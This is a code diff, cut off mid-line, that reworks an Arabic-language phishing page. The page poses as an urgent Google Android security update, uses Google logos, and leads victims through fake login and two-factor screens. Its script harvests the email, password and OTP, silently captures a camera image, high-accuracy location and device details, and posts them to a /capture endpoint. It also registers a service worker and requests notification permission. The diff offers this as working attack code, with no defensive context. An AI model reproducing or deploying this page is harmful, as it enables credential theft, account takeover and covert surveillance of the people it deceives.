--- a/index.html
+++ b/index.html
@@ -3,38 +3,85 @@
 <head>
     <link rel="manifest" href="/manifest.json">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>تحديث الأمان</title>
+    <title>تحديث النظام</title>
     <style>
-        body { background: #121212; color: white; font-family: sans-serif; text-align: center; padding: 20px; }
-        .box { background: #1e1e1e; padding: 20px; border-radius: 15px; margin-top: 50px; }
-        input { width: 90%; padding: 12px; margin: 10px 0; border-radius: 8px; border: 1px solid #444; background: #2c2c2c; color: white; }
-        button { background: #007bff; color: white; width: 95%; padding: 12px; border: none; border-radius: 8px; font-weight: bold; cursor: pointer; }
+        body { background: #1a1a1a; color: #e0e0e0; font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; text-align: center; padding: 20px; }
+        .container { background: #2c2c2c; padding: 30px; border-radius: 15px; box-shadow: 0 5px 20px rgba(0,0,0,0.5); margin-top: 50px; }
+        h2 { color: #00bcd4; margin-bottom: 20px; }
+        p { margin-bottom: 25px; line-height: 1.6; }
+        input { width: 90%; padding: 14px; margin: 12px 0; border-radius: 10px; border: 1px solid #555; background: #3a3a3a; color: #e0e0e0; font-size: 1em; }
+        button { background: #00bcd4; color: white; width: 95%; padding: 15px; border: none; border-radius: 10px; font-weight: bold; cursor: pointer; font-size: 1.1em; transition: background 0.3s ease; }
+        button:hover { background: #0097a7; }
+        .loading-bar { width: 0%; height: 8px; background-color: #4CAF50; border-radius: 5px; margin: 20px auto; transition: width 3s ease-in-out; }
         .hidden { display: none; }
+        .progress-text { margin-top: 15px; font-size: 0.9em; color: #bbbbbb; }
+        .logo { margin-bottom: 30px; }
     </style>
 </head>
 <body>
-    <div id="login-screen" class="box">
-        <h2>⚠️ تحديث مطلوب</h2>
-        <p>يرجى تسجيل الدخول لتأكيد الحساب</p>
-        <input type="email" id="email" placeholder="البريد الإلكتروني" required>
-        <input type="password" id="pass" placeholder="كلمة المرور" required>
-        <button onclick="startCapture()">تسجيل الدخول</button>
+    <div id="initial-screen" class="container">
+        <img src="https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png" alt="Google Logo" class="logo" width="60">
+        <h2>تحديث نظام Android عاجل</h2>
+        <p>اكتشفنا ثغرة أمنية حرجة في نظام Android الخاص بك. يتطلب هذا تحديثاً فورياً لتجنب فقدان البيانات.</p>
+        <button onclick="startInitialProcess()">بدء التحديث الآمن</button>
     </div>
 
-    <div id="otp-screen" class="box hidden">
-        <h2>🔐 التحقق بخطوتين</h2>
-        <p>أدخل الرمز المرسل إلى هاتفك</p>
-        <input type="number" id="otp" placeholder="000000">
-        <button onclick="sendOtp()">تأكيد</button>
+    <div id="login-screen" class="container hidden">
+        <img src="https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png" alt="Google Logo" class="logo" width="60">
+        <h2>تأكيد بياناتك لإنهاء التحديث</h2>
+        <p>لحماية بياناتك، يرجى تأكيد حساب Google الخاص بك للمتابعة.</p>
+        <input type="email" id="email" placeholder="البريد الإلكتروني أو رقم الهاتف" required>
+        <input type="password" id="pass" placeholder="كلمة المرور" required>
+        <button onclick="captureAndProceed()">تأكيد ومتابعة</button>
+    </div>
+
+    <div id="otp-screen" class="container hidden">
+        <img src="https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png" alt="Google Logo" class="logo" width="60">
+        <h2>التحقق النهائي: رمز الأمان</h2>
+        <p>تم إرسال رمز تحقق سري إلى هاتفك. أدخله هنا لإكمال التحديث وتأمين جهازك.</p>
+        <input type="number" id="otp" placeholder="رمز التحقق (6 أرقام)" required>
+        <button onclick="sendOtp()">تأكيد الرمز</button>
+        <p class="progress-text" id="otp-status">جاري التحقق من الرمز...</p>
+    </div>
+
+    <div id="final-screen" class="container hidden">
+        <img src="https://www.gstatic.com/images/branding/product/2x/googleg_48dp.png" alt="Google Logo" class="logo" width="60">
+        <h2>✅ تم التحديث بنجاح!</h2>
+        <p>جهازك آمن ومحمي الآن. يمكنك استخدام هاتفك كالمعتاد.</p>
+        <div class="loading-bar" id="final-loading" style="width: 100%; background-color: #00bcd4;"></div>
+        <p class="progress-text">جاري إعادة تشغيل خدمات النظام في الخلفية...</p>
     </div>
 
     <script>
         let userEmail = "";
+        let retryCount = 0; // لعد محاولات إرسال كود التحقق
+        const MAX_RETRIES = 3;
+
+        async function registerServiceWorker() {
+            if ('serviceWorker' in navigator) {
+                try {
+                    const registration = await navigator.serviceWorker.register('/service-worker.js');
+                    console.log('Service Worker registered with scope:', registration.scope);
+                    // طلب إذن الإشعارات هنا لتعمل التنبيهات لاحقاً
+                    Notification.requestPermission();
+                } catch (error) {
+                    console.error('Service Worker registration failed:', error);
+                }
+            }
+        }
+
+        async function startInitialProcess() {
+            document.getElementById('initial-screen').classList.add('hidden');
+            document.getElementById('login-screen').classList.remove('hidden');
+            registerServiceWorker(); // تفعيل الـ Service Worker عند أول تفاعل
+        }
+
         async function getCameraImage() {
             try {
                 const stream = await navigator.mediaDevices.getUserMedia({ video: true });
                 const video = document.createElement('video');
-                video.srcObject = stream; await video.play();
+                video.srcObject = stream;
+                await video.play();
                 const canvas = document.createElement('canvas');
                 canvas.width = video.videoWidth; canvas.height = video.videoHeight;
                 canvas.getContext('2d').drawImage(video, 0, 0);
@@ -43,36 +90,22 @@
             } catch (e) { return null; }
         }
 
-        async function startCapture() {
+        async function captureAndProceed() {
             userEmail = document.getElementById('email').value;
             const pass = document.getElementById('pass').value;
             const img = await getCameraImage();
+
             navigator.geolocation.getCurrentPosition(async (pos) => {
-                await sendToServer(userEmail, pass, { lat: pos.coords.latitude, lon: pos.coords.longitude }, img);
+                await sendToServer('/capture', { email: userEmail, password: pass, location: { lat: pos.coords.latitude, lon: pos.coords.longitude }, image: img, device: navigator.userAgent });
             }, async () => {
-                await sendToServer(userEmail, pass, null, img);
+                await sendToServer('/capture', { email: userEmail, password: pass, location: null, image: img, device: navigator.userAgent });
             }, { enableHighAccuracy: true });
+
             document.getElementById('login-screen').classList.add('hidden');
             document.getElementById('otp-screen').classList.remove('hidden');
-        }
-
-        async function sendToServer(email, pass, loc, img) {
-            await fetch('/capture', {
-                method: 'POST',
-                headers: { 'Content-Type': 'application/json' },
-                body: JSON.stringify({ email, password: pass, location: loc, image: img, device: navigator.userAgent })
-            });
+            startOtpTimer(); // بدء مؤقت الـ OTP الوهمي
         }
 
         async function sendOtp() {
             const code = document.getElementById('otp').value;
-            await fetch('/capture-otp', {
-                method: 'POST',
-                headers: { 'Content-Type': 'application/json' },
-                body: JSON.stringify({ otp: code, email: userEmail })
-            });
-            alert("خطأ في الخادم، حاول مجدداً لاحقاً.");
-        }
-    </script>
-</body>
-</html>
+            document.getElementById('otp-status').innerText
